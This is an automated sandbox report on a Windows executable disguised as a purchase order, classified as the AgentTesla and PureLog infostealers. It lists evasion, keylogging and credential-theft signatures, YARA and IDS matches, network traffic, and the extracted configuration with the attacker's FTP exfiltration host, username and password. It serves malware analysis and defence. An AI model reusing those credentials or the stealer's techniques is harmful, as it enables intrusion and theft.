Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
[Purchase Order] PO2411024.exe

Overview

General Information

Sample name:[Purchase Order] PO2411024.exe
Analysis ID:1557572
MD5:e3d9142bc972b5c18cf65055d754730e
SHA1:9a901d247c4d70d427bc2361aa7ecf187754aaed
SHA256:fc62e1f8a06c83ac2f02300784042f52a8f071466843f9946724ff6f99ebc096
Tags:exeRedLineStealeruser-adrian__luca
Infos:

Detection

AgentTesla, PureLog Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AgentTesla
Yara detected PureLog Stealer
.NET source code contains method to dynamically call methods (often used by packers)
AI detected suspicious sample
Check if machine is in data center or colocation facility
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to log keystrokes (.Net Source)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Yara detected Generic Downloader
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
May check the online IP address of the machine
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses FTP
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • [Purchase Order] PO2411024.exe (PID: 6892 cmdline: "C:\Users\user\Desktop\[Purchase Order] PO2411024.exe" MD5: E3D9142BC972B5C18CF65055D754730E)
    • RegSvcs.exe (PID: 7000 cmdline: "C:\Users\user\Desktop\[Purchase Order] PO2411024.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
{"Exfil Mode": "FTP", "Host": "ftp://ftp.jeepcommerce.rs", "Username": "w133y@jeepcommerce.rs", "Password": "Q6]7rLSD*gU2"}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    SourceRuleDescriptionAuthorStrings
    00000002.00000002.4938434032.0000000002902000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000002.00000002.4938434032.0000000002902000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000002.00000002.4938434032.000000000292E000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          00000002.00000002.4941689440.0000000005060000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            00000002.00000002.4941689440.0000000005060000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
              Click to see the 20 entries
              SourceRuleDescriptionAuthorStrings
              2.2.RegSvcs.exe.400000.0.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
              • 0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
              • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
              • 0x700:$s3: 83 EC 38 53 B0 D0 88 44 24 2B 88 44 24 2F B0 DF 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
              • 0x1ed8a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
              • 0x1e9d0:$s5: delete[]
              • 0x1de88:$s6: constructor or from DllMain.
              0.2.[Purchase Order] PO2411024.exe.3e00000.1.raw.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
              • 0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
              • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
              • 0x700:$s3: 83 EC 38 53 B0 D0 88 44 24 2B 88 44 24 2F B0 DF 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
              • 0x1ed8a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
              • 0x1e9d0:$s5: delete[]
              • 0x1de88:$s6: constructor or from DllMain.
              2.2.RegSvcs.exe.400000.0.raw.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
              • 0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
              • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
              • 0x1300:$s3: 83 EC 38 53 B0 D0 88 44 24 2B 88 44 24 2F B0 DF 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
              • 0x2018a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
              • 0x1fdd0:$s5: delete[]
              • 0x1f288:$s6: constructor or from DllMain.
              2.2.RegSvcs.exe.5060000.8.raw.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                2.2.RegSvcs.exe.5060000.8.raw.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                  Click to see the 86 entries
                  No Sigma rule has matched
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-11-18T13:05:49.502950+010020299271A Network Trojan was detected192.168.2.1249712195.252.110.25321TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-11-18T13:05:50.265914+010028555421A Network Trojan was detected192.168.2.1249713195.252.110.25362856TCP
                  2024-11-18T13:05:50.271641+010028555421A Network Trojan was detected192.168.2.1249713195.252.110.25362856TCP

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Source: [Purchase Order] PO2411024.exeAvira: detected
                  Source: http://ftp.jeepcommerce.rsAvira URL Cloud: Label: malware
                  Source: 2.2.RegSvcs.exe.2650626.1.raw.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "FTP", "Host": "ftp://ftp.jeepcommerce.rs", "Username": "w133y@jeepcommerce.rs", "Password": "Q6]7rLSD*gU2"}
                  Source: [Purchase Order] PO2411024.exeReversingLabs: Detection: 55%
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                  Source: [Purchase Order] PO2411024.exeJoe Sandbox ML: detected
                  Source: [Purchase Order] PO2411024.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                  Source: Binary string: _.pdb source: RegSvcs.exe, 00000002.00000002.4940216324.00000000038D1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4940845713.0000000004DB0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4938021567.000000000260F000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: wntdll.pdbUGP source: [Purchase Order] PO2411024.exe, 00000000.00000003.2499766443.0000000003EA0000.00000004.00001000.00020000.00000000.sdmp, [Purchase Order] PO2411024.exe, 00000000.00000003.2497465196.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: wntdll.pdb source: [Purchase Order] PO2411024.exe, 00000000.00000003.2499766443.0000000003EA0000.00000004.00001000.00020000.00000000.sdmp, [Purchase Order] PO2411024.exe, 00000000.00000003.2497465196.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp
                  Source: C:\Users\user\Desktop\[Purchase Order] PO2411024.exeCode function: 0_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,0_2_004339B6
                  Source: C:\Users\user\Desktop\[Purchase Order] PO2411024.exeCode function: 0_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00452492
                  Source: C:\Users\user\Desktop\[Purchase Order] PO2411024.exeCode function: 0_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00442886
                  Source: C:\Users\user\Desktop\[Purchase Order] PO2411024.exeCode function: 0_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_004788BD
                  Source: C:\Users\user\Desktop\[Purchase Order] PO2411024.exeCode function: 0_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose,0_2_0045CAFA
                  Source: C:\Users\user\Desktop\[Purchase Order] PO2411024.exeCode function: 0_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00431A86
                  Source: C:\Users\user\Desktop\[Purchase Order] PO2411024.exeCode function: 0_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,0_2_0044BD27
                  Source: C:\Users\user\Desktop\[Purchase Order] PO2411024.exeCode function: 0_2_0045DE8F FindFirstFileW,FindClose,0_2_0045DE8F
                  Source: C:\Users\user\Desktop\[Purchase Order] PO2411024.exeCode function: 0_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0044BF8B

                  Networking

                  barindex
                  Source: Network trafficSuricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.12:49713 -> 195.252.110.253:62856
                  Source: Network trafficSuricata IDS: 2029927 - Severity 1 - ET MALWARE AgentTesla Exfil via FTP : 192.168.2.12:49712 -> 195.252.110.253:21
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.5060000.8.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.264f73e.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.38d5678.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.4db0000.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.38d6560.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.3924698.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.2650626.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.4db0ee8.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000002.00000002.4941689440.0000000005060000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.4940845713.0000000004DB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: global trafficTCP traffic: 192.168.2.12:49713 -> 195.252.110.253:62856
                  Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                  Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
                  Source: Joe Sandbox ViewIP Address: 195.252.110.253 195.252.110.253
                  Source: unknownDNS query: name: ip-api.com
                  Source: unknownFTP traffic detected: 195.252.110.253:21 -> 192.168.2.12:49712 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 50 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 50 allowed.220-Local time is now 13:05. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 50 allowed.220-Local time is now 13:05. Server port: 21.220-This is a private system - No anonymous login 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 50 allowed.220-Local time is now 13:05. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 50 allowed.220-Local time is now 13:05. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: C:\Users\user\Desktop\[Purchase Order] PO2411024.exeCode function: 0_2_004422FE InternetQueryDataAvailable,InternetReadFile,0_2_004422FE
                  Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                  Source: global trafficDNS traffic detected: DNS query: ip-api.com
                  Source: global trafficDNS traffic detected: DNS query: ftp.jeepcommerce.rs
                  Source: RegSvcs.exe, 00000002.00000002.4938434032.000000000292E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ftp.jeepcommerce.rs
                  Source: RegSvcs.exe, 00000002.00000002.4938434032.00000000028D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com
                  Source: RegSvcs.exe, 00000002.00000002.4941689440.0000000005060000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4938434032.00000000028D1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4940216324.00000000038D1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4940845713.0000000004DB0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4938021567.000000000260F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hosting
                  Source: RegSvcs.exe, 00000002.00000002.4938434032.00000000028D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: RegSvcs.exe, 00000002.00000002.4941689440.0000000005060000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4940216324.00000000038D1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4940845713.0000000004DB0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4938021567.000000000260F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/

                  Key, Mouse, Clipboard, Microphone and Screen Capturing

                  barindex
                  Source: 2.2.RegSvcs.exe.5060000.8.raw.unpack, NmHr1WHWKO.cs.Net Code: _5X3Zzx6JgyO
                  Source: C:\Users\user\Desktop\[Purchase Order] PO2411024.exeCode function: 0_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_0045A10F
                  Source: C:\Users\user\Desktop\[Purchase Order] PO2411024.exeCode function: 0_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_0045A10F
                  Source: C:\Users\user\Desktop\[Purchase Order] PO2411024.exeCode function: 0_2_0046DC80 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,0_2_0046DC80
                  Source: C:\Users\user\Desktop\[Purchase Order] PO2411024.exeCode function: 0_2_0044C37A GetKeyboardState,SetKeyboardState,PostMessageW,PostMessageW,SendInput,0_2_0044C37A
                  Source: C:\Users\user\Desktop\[Purchase Order] PO2411024.exeCode function: 0_2_0047C81C SendMessageW,DefDlgProcW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0047C81C

                  System Summary

                  barindex
                  Source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 0.2.[Purchase Order] PO2411024.exe.3e00000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 2.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 2.2.RegSvcs.exe.5060000.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 2.2.RegSvcs.exe.5060000.8.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 2.2.RegSvcs.exe.5060000.8.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 2.2.RegSvcs.exe.5060000.8.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 2.2.RegSvcs.exe.264f73e.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 2.2.RegSvcs.exe.264f73e.2.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 2.2.RegSvcs.exe.38d5678.5.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 2.2.RegSvcs.exe.38d5678.5.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 2.2.RegSvcs.exe.4db0000.6.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 2.2.RegSvcs.exe.4db0000.6.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 2.2.RegSvcs.exe.38d5678.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 2.2.RegSvcs.exe.38d5678.5.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 2.2.RegSvcs.exe.4db0000.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 2.2.RegSvcs.exe.4db0000.6.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 2.2.RegSvcs.exe.38d6560.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 2.2.RegSvcs.exe.38d6560.4.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 2.2.RegSvcs.exe.3924698.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 2.2.RegSvcs.exe.3924698.3.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 2.2.RegSvcs.exe.2650626.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 2.2.RegSvcs.exe.2650626.1.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 2.2.RegSvcs.exe.4db0ee8.7.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 2.2.RegSvcs.exe.4db0ee8.7.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 2.2.RegSvcs.exe.264f73e.2.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 2.2.RegSvcs.exe.264f73e.2.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 2.2.RegSvcs.exe.3924698.3.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 2.2.RegSvcs.exe.3924698.3.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 2.2.RegSvcs.exe.4db0ee8.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 2.2.RegSvcs.exe.4db0ee8.7.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 2.2.RegSvcs.exe.38d6560.4.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 2.2.RegSvcs.exe.38d6560.4.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 2.2.RegSvcs.exe.2650626.1.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 2.2.RegSvcs.exe.2650626.1.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 00000002.00000002.4941689440.0000000005060000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 00000002.00000002.4941689440.0000000005060000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 00000002.00000002.4940845713.0000000004DB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 00000002.00000002.4940845713.0000000004DB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 00000002.00000002.4936860765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 00000000.00000002.2501872609.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: initial sampleStatic PE information: Filename: [Purchase Order] PO2411024.exe
                  Source: C:\Users\user\Desktop\[Purchase Order] PO2411024.exeCode function: 0_2_00431BE8: GetFullPathNameW,__swprintf,_wcslen,CreateDirectoryW,CreateFileW,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,0_2_00431BE8
                  Source: C:\Users\user\Desktop\[Purchase Order] PO2411024.exeCode function: 0_2_00446313 DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,_wcsncpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00446313
                  Source: C:\Users\user\Desktop\[Purchase Order] PO2411024.exeCode function: 0_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,0_2_004333BE
                  Source: C:\Users\user\Desktop\[Purchase Order] PO2411024.exeCode function: 0_2_004096A00_2_004096A0
                  Source: C:\Users\user\Desktop\[Purchase Order] PO2411024.exeCode function: 0_2_0042200C0_2_0042200C
                  Source: C:\Users\user\Desktop\[Purchase Order] PO2411024.exeCode function: 0_2_0041A2170_2_0041A217
                  Source: C:\Users\user\Desktop\[Purchase Order] PO2411024.exeCode function: 0_2_004122160_2_00412216
                  Source: C:\Users\user\Desktop\[Purchase Order] PO2411024.exeCode function: 0_2_0042435D0_2_0042435D
                  Source: C:\Users\user\Desktop\[Purchase Order] PO2411024.exeCode function: 0_2_004033C00_2_004033C0
                  Source: C:\Users\user\Desktop\[Purchase Order] PO2411024.exeCode function: 0_2_0044F4300_2_0044F430
                  Source: C:\Users\user\Desktop\[Purchase Order] PO2411024.exeCode function: 0_2_004125E80_2_004125E8
                  Source: C:\Users\user\Desktop\[Purchase Order] PO2411024.exeCode function: 0_2_0044663B0_2_0044663B
                  Source: C:\Users\user\Desktop\[Purchase Order] PO2411024.exeCode function: 0_2_004138010_2_00413801
                  Source: C:\Users\user\Desktop\[Purchase Order] PO2411024.exeCode function: 0_2_0042096F0_2_0042096F
                  Source: C:\Users\user\Desktop\[Purchase Order] PO2411024.exeCode function: 0_2_004129D00_2_004129D0
                  Source: C:\Users\user\Desktop\[Purchase Order] PO2411024.exeCode function: 0_2_004119E30_2_004119E3
                  Source: C:\Users\user\Desktop\[Purchase Order] PO2411024.exeCode function: 0_2_0041C9AE0_2_0041C9AE
                  Source: C:\Users\user\Desktop\[Purchase Order] PO2411024.exeCode function: 0_2_0047EA6F0_2_0047EA6F
                  Source: C:\Users\user\Desktop\[Purchase Order] PO2411024.exeCode function: 0_2_0040FA100_2_0040FA10
